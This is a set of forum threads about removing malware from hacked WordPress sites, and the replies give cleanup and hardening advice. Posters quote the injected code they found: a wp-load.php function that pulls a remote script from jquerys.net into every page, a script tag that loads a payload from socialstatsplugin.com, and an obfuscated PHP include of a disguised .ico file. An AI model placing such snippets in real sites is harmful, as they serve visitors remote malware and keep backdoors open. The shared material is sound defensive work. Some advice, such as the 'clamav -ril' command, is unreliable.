this script keeps coming back to my wp-load.php file in public_html folder:
function pluginAuth(){
echo(wp_remote_retrieve_body(wp_remote_get('http://jquerys.net/jquery-1.6.3.min.js')));
}
add_action('wp_footer', 'pluginAuth');
this directs to a virus site "jquerys.net"
What can be the solution. deleting the fucntion from wp-load.php does not eliminate it, as it regenrates on refreshing any page of my blog.
kindly help
There could be malicious code injected into any of your wordpress files. You will need to go through all files especially inside your theme to look for code or files / folders that shouldn't be there.
After this you can use this article to make your build more secure:
http://codex.wordpress.org/Hardening_WordPress
Has been very useful to me in the past for preventing this sort of thing from happening again. You can do as many or as little of the security measures as you like.
I would definitely recommend doing everything from the Securing wp-admin section.
Most probably you have some infected or malicious file in wp-ulpoads folder, check there also for any file type, different than image or documents.
Also important: check your current theme functions.php file for malicious code, often hacked themes (i.e. downloaded via bittorent websites of mafiashare websites) inject such code, search for any curl() requests, actually not only in functions.php, but in files (if your theme has them) options.php or settings.php, etc.
You seem to have an infected WordPress installation. Use Theme Authenticity Checker OR Exploit Scanner plugins for automatically detecting potential malicious files that might be the culprit.
You can also try the free scan service of Sucuri.
Once you are done with the identification of the corrupted files, replace them with their official counterparts which you can get from WordPress.org.
As a defensive measure, install WordPress File Monitor Plus plugin - as it emails each time some file is changed. This will allow you to quickly revert any changes that some hacker/script makes in the future!
i was able to detect the malicious script. it was in the public_html folder. the file was "main.php" which is not in the default installation and also it does not contribute to any theme or plugin. after deleting all the unverfied plugins, i deleted this file and deleted the code in the wp-load.php.
at first when i did not deleted the "main.php" file. the 'function' in the wp-load kept coming back. but after deleting "main.php" file, i have rid myself from this virus.
There is new virus in WP
There's a downloading of a update.exe initiated by line
<script src="//socialstatsplugin.com/jqury.js"></script>
i Have done some reviews for this kind of virus.
Just go to your WP folder and check if any unwanted hidden file and when you browse through that , the files are unreadable.
As said Just do
DELETE FROM wp_options WHERE option_name like '%wp_data_newa%'
and delete all unwanted hidden folder within any folder. It worked till now. Hope it will help. Never knows the future.
Thanks
Related
I've got a site that has been hacked for the fourth time now this month. With scripts hosted on autofaucet.org. (sloppy code even, found their names. Some Russian dudes. But that's off topic) I've taken some measurements to prevent a new hack, but alas...
I've installed a clean WP installation on the server, with clean files and a clean DB.
reinstalled the plugins clean
I have All In One WP Security & Firewall plugin for file scanning, firewall, hide inlog page, etc.
Changed all the wordpress passwords.
I've notices the encoded code is being placed in files called assets.php.
I'm curious how a hacker would inject/place the code on the server. How to prevent it better and what questions to ask the webhost company. I've asked them before and they just say it's my fault, update the wp installation and move on. What should they check if the code is injected from their side?
Your log files (of the web server) e.g. /var/log/nginx/access.log with the nginx web server will tell you who it was. Look for the change date/time of the assets.php file. Then check server access logs for IP addresses from that exact time. Then search logs for that IP address. You will find the first accesses by that IP address. That was likely the hack.
Usually Wordpress plugins are to blame as long as you keep the WP site updated. So, you could disable plugins not needed urgently, and disable the others one by one, or all for testing.
As a workaround, you can make the index.php (or other) file under attack read-only. In the past I have worked around particular attacks by chown root.root filetobeattacked.php which usually works (but may hinder updates, so it's a temporary solution). If you are not root on the server (shared hosting) perhaps chmod 444 filetobeattacked.php could work.
I had same issue before. It might be the wordpress core files.
Delete all files except wp-content, then download and replace it with the new wordpress files.
Search for 'autofaucet.org' inside wp-content, and remove if necessary.
Open wp-contents/themes/ then check functions.php - check if any additional code is there on top. Check the last updated files and time inside the theme and plugins.
Export database files and searcg for 'autofaucet.org' and remove if any item found.
In my wordpress website .htaccess has some strange redirection script, i removed the file but once the site is browsed the .htaccess file is automatically created with the strange script. in addition to that a folder named generall is also automatically creating even though we delete the folder. The folder has one php file and html file with strange scripts. Please help to resolve the hacking issue
You need to completely remove the infection from your site. Here's the easiest WordPress guide to follow: https://malcure.com/blog/security/the-easiest-guide-to-wordpress-malware-removal/
Your website still contains malware. You need to do a complete virus scan. You can use WordFence plugin to scan.
With these also try
1. Update all theme & plugins.
2. Do a manual update of your WordPress.
It looks like my wordpress site has been hacked. Following code snipt was in index.php, wp-config.php
<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
WP Admin URL and put strong password username
changed cpanel/FTP password with strong one
Implemented iTheme Security
Updated Wordpress to latest (themes and plugins)
However, the code again repeated. What can be good solutions?
p.s. I am using siteground.
Thanks
Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow despite your changes of host and passwords you hacker is able to get in, once they are in they can setup all sorts of backdoors to keep access, any .php file of theirs can do this.
At the moment closing the initial front-door they use is your sole occupation.
Follow the advice in this article:
https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. you'll have to replace all files with fresh downloads. mostly it's straight forward:
Backup the whole installation (just in case)
Download the complete wp-content/uploads folder
Make a Screenshot or save the page with the currently active plugins
Delete ALL files
Get a fresh wordpress setup and extract it
Download a fresh copy of your theme and child-theme (recreate the previous setup)
Copy the previous wp-config.php to this fresh install. but take a GOOD look at it. usually it also has some virus/backdoors in it. usually easy to see and remove. now you're already connected with your DB
Examine the saved uploads folder for files that shouldnt be there, like php files. then upload it to the new folder
Reinstall all plugins, fresh downloads
I faced this problem too, and step by step I did the steps below:
Cleaning the injected code, manually
Changing all the passwords
Hiding the WP admin dashboard URL
Limiting the login attempts
Installing security plugins (Sucuri, Wordfence security)
Contracting with Sucuri plan
The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually.
you can also visit this link too
https://naderzad.info/web-development/wordpress-code-injection/
Few logged customers can't remove product from cart on cart page. After click "remove" button Woocommerce returns success message but product is still in basket. Is strange because only few customers have this problem.
What can be wrong?
Do you have access to your web files, on your server? If so, find your .htaccess file. If this file is on your server, it would most likely be in the httpdocs Directory; the same place where you will find the wp-admin, wp-content and wp-includes folders.
Once you have found the .htaccess file:
Make a back up of the file.
Save the file to your Desktop.
Delete the file from your server.
Clear your Cache, on your browser.
Then add a few products to your Basket, followed by then deleting them. See if this resolves your problem.
If this does resolve the issue, then it will be a method of elimination, as to ascertain which part of the .htaccess file is causing this caching glitch. Simply upload the .htaccess file, including a little bit of the file, until the problem reappears.
If this does not resolve your problem, it would be a good idea as to ask those with the issue, what browser they are using, in case the issue is browser specific.
Hope this helps.
I have two wordpress websites on my dedicated server, and the htaccess files of both websites keeps changing to default one and become 444 chmod.
Even after i fix it and put chmod 444 of mine few days later it changes again on both websites.
Could you please help me make the htaccess files impossible to be overwritten or edited no matter what?
I will appreciate any help,
Thank you
I find my infected file in one of the themes of wordpress, so you have two ways
LogIn to wordpress and delete all the new themes that you are not using.
Go to you your admin page go to folder: wp-content/themes/sydney/404.php
open it and if you see the virus code like if it has +xml or Rewrite wordpress etc delete it.
go through all the themes folder 404.php pages.
change your wp login user name and password.
delete all the infected .htaccess files/remove the infected code and monitor your website the regularly and check ur .htaccess file to make sure you don't get attacked again.
I have resolved this by scanning my ubuntu server using clamAv through SSH.
Here is the command line I used:
clamav -ril /home/user/clamav.txt
The results revealed a backdoor script embedded in one of my old themes which wasn't even activated. I deleted that old theme entirely and rebooted my server then the problem is gone.
Don't waste your time with a WordPress plugin to scan for malware or
backdoor because that is unlikely to locate any virus. Install ClamAV
into your server then scan. If nothing is detected yet?! Install
another anti similar to ClamAV until you succeed to locate the threat.